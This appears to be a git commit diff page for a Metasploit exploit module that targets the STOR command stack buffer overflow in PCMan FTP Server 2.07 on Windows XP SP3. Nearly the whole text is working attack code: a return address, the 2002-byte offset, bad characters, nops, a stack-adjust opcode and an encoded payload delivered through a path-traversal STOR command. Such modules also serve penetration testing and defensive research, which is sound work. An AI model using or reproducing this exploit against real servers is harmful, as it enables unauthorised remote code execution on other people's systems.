added PCMan's FTP Server Crafted Multiple Command Handling Remote Buffer Overflow (OSVDB 94624)
Rick Flores (nanotechz9l)
parent
92cf886e49
commit
82e3910959
|
|
@ -11,10 +11,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = AverageRanking
|
Rank = AverageRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Ftp
|
include Msf::Exploit::Remote::Ftp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'PCMAN FTP Server STOR Command Stack Buffer Overflow',
|
'Name' => 'PCMAN FTP Server STOR Command Stack Overflow',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a buffer overflow vulnerability
|
This module exploits a buffer overflow vulnerability
|
||||||
found in the STOR command of the PCMAN FTP v2.07 Server
|
found in the STOR command of the PCMAN FTP v2.07 Server
|
||||||
|
|
@ -22,14 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'Christian (Polunchis) Ramirez', # Initial Discovery
|
'Christian (Polunchis) Ramirez', # Initial Discovery
|
||||||
'Rick (nanotechz9l) Flores', # Metasploit Module
|
'Rick (nanotechz9l) Flores', # Metasploit Module
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision: $',
|
'Version' => '$Revision: $',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'URL', 'http://osvdb.org/show/osvdb/94624'],
|
[ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
|
||||||
[ 'EDB', 'http://www.exploit-db.com/exploits/27703/'],
|
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
|
|
@ -37,27 +36,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 1000,
|
'Space' => 1000,
|
||||||
'BadChars' => "\x00\xff\x0a\x0d\x20\x40",
|
'BadChars' => "\x00\xff\x0a\x0d\x20\x40",
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Windows XP SP3',
|
[ 'Windows XP SP3',
|
||||||
{
|
{
|
||||||
'Ret' => 0x7C91FCD8, # jmp esp ret from kernel32.dll
|
'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
|
||||||
'Offset' => 2002
|
'Offset' => 2002
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Jun 27 2013',
|
'DisclosureDate' => 'Jul 17 2011',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
connect
|
connect
|
||||||
disconnect
|
disconnect
|
||||||
if (banner =~ /220 PCMan's FTP Server 2\.0/)
|
if (banner =~ /220 PCMan's FTP Server 2.0/)
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
end
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
|
|
@ -65,9 +64,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
connect_login
|
connect_login
|
||||||
print_status("Trying victim #{target.name}...")
|
print_status("Trying victim #{target.name}...")
|
||||||
sploit = "\x41" * target['Offset'] << [target.ret].pack('V') << make_nops(4) << payload.encoded
|
sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
|
||||||
sploit << rand_text_alpha(sploit.length)
|
sploit << make_nops(4)
|
||||||
|
sploit << payload.encoded
|
||||||
send_cmd( ['STOR', '/../' + sploit], false )
|
send_cmd( ['STOR', '/../' + sploit], false )
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue